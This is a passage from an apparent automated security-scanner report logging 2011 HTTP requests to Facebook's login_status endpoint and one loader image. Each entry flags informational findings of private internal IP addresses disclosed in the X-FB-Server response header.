GET /extern/login_status.php?api_key=172521166094230&app_id=172521166094230&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe6f90f2c%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff19eaad73%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfd640084c%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff19eaad73%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2345eaf24%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23a42364%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff19eaad73%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2345eaf24&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ca2e47c%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff19eaad73%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2345eaf24&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d1bf00d8%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff19eaad73%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2345eaf24&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.lbmc.com/client-login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.105.61
X-Cnection: close
Date: Sat, 07 May 2011 01:18:46 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
28.59. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=131538103586818&app_id=131538103586818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2dc2c2cfc%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff20a4eae48%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e321af28%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff20a4eae48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b72ab49c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc60a7274%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff20a4eae48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b72ab49c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3416c4b1%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff20a4eae48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b72ab49c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df305028fbc%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff20a4eae48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b72ab49c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3416c4b1&origin=http%3A%2F%2Fwww.expedia.com%2Ff20a4eae48&relation=parent&transport=postmessage&frame=f2b72ab49c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.50.53
X-Cnection: close
Date: Fri, 06 May 2011 22:35:39 GMT
Content-Length: 0

28.60. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=85b6ec633ce86a49c565375254dbc550&extern=0&channel=http%3A%2F%2Fallatsea.net%2Fdirectclassifieds.php%3FmenuCategories%3D8%26fbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/directclassifieds.php?menuCategories=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.147.102
X-Cnection: close
Date: Fri, 06 May 2011 21:10:40 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
28.61. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=172521166094230&app_id=172521166094230&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df39e4ed7dc%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff25ada2fe8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df28e60d274%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff25ada2fe8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16d9da6d%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3090c80ec%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff25ada2fe8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16d9da6d&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2442ac35%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff25ada2fe8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16d9da6d&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df22abf554%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff25ada2fe8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16d9da6d&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.lbmc.com/service/staffing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.97.63
X-Cnection: close
Date: Sat, 07 May 2011 01:18:39 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
28.62. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=85b6ec633ce86a49c565375254dbc550&extern=0&channel=http%3A%2F%2Fallatsea.net%2Fby-category%2FDeep_Sea_Fishing%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Deep_Sea_Fishing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.132.131
X-Cnection: close
Date: Fri, 06 May 2011 21:10:10 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
28.63. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=85b6ec633ce86a49c565375254dbc550&extern=0&channel=http%3A%2F%2Fallatsea.net%2Fsubscribe.htm%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/subscribe.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.118.107
X-Cnection: close
Date: Fri, 06 May 2011 21:10:17 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
28.64. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=85b6ec633ce86a49c565375254dbc550&extern=0&channel=http%3A%2F%2Fallatsea.net%2F%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.108.102
X-Cnection: close
Date: Fri, 06 May 2011 21:06:47 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
28.65. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=172521166094230&app_id=172521166094230&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff43a25d4%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff154f23d0c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df17cc94a7c%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff154f23d0c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df110939d6c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df18b6439b%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff154f23d0c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df110939d6c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df305c6adb8%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff154f23d0c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df110939d6c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7c6deacc%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff154f23d0c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df110939d6c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.lbmc.com/service/investments
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.92.55
X-Cnection: close
Date: Sat, 07 May 2011 01:18:40 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
28.66. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=172521166094230&app_id=172521166094230&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df98e52998%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff338b71f0%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34583edb%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff338b71f0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df4028b0ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a1a15c34%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff338b71f0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df4028b0ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df26ed28d08%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff338b71f0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df4028b0ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ef4d091c%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff338b71f0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df4028b0ec&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.lbmc.com/about-lbmc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.33.83
X-Cnection: close
Date: Sat, 07 May 2011 01:18:02 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
28.67. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=131538103586818&app_id=131538103586818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1499dcf34%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff9e2604f4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfadeee38%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff9e2604f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df17cc3f4b4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df83f63454%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff9e2604f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df17cc3f4b4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df35de3a3%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff9e2604f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df17cc3f4b4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df221aff988%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff9e2604f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df17cc3f4b4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f35de3a3&origin=http%3A%2F%2Fwww.expedia.com%2Ff9e2604f4&relation=parent&transport=postmessage&frame=f17cc3f4b4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.87.63
X-Cnection: close
Date: Fri, 06 May 2011 22:33:42 GMT
Content-Length: 0

28.68. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=172521166094230&app_id=172521166094230&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1b49671d8%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ffbc567424%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3aecda184%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ffbc567424%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d3508b88%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1160c45ac%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ffbc567424%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d3508b88&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d2894114%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ffbc567424%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d3508b88&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df76a2480%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ffbc567424%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d3508b88&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.lbmc.com/user
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.89.61
X-Cnection: close
Date: Sat, 07 May 2011 01:19:15 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
28.69. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=85b6ec633ce86a49c565375254dbc550&extern=0&channel=http%3A%2F%2Fallatsea.net%2Fby-category%2FSailing_Regatta%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Sailing_Regatta
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.116.103
X-Cnection: close
Date: Fri, 06 May 2011 21:10:06 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
28.70. http://www.facebook.com/images/loaders/indicator_black.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /images/loaders/indicator_black.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/loaders/indicator_black.gif HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/media/set/?set=pa.82321587255
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=dh9j6; reg_ext_ref=http%3A%2F%2Fwww.socialfollow.com%2F; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FSocialFollow; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Dpa.82321587255

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/gif
Expires: Sun, 05 Jun 2011 17:41:47 GMT
X-FB-Server: 10.52.141.47
X-Cnection: close
Date: Fri, 06 May 2011 17:41:47 GMT
Content-Length: 1996

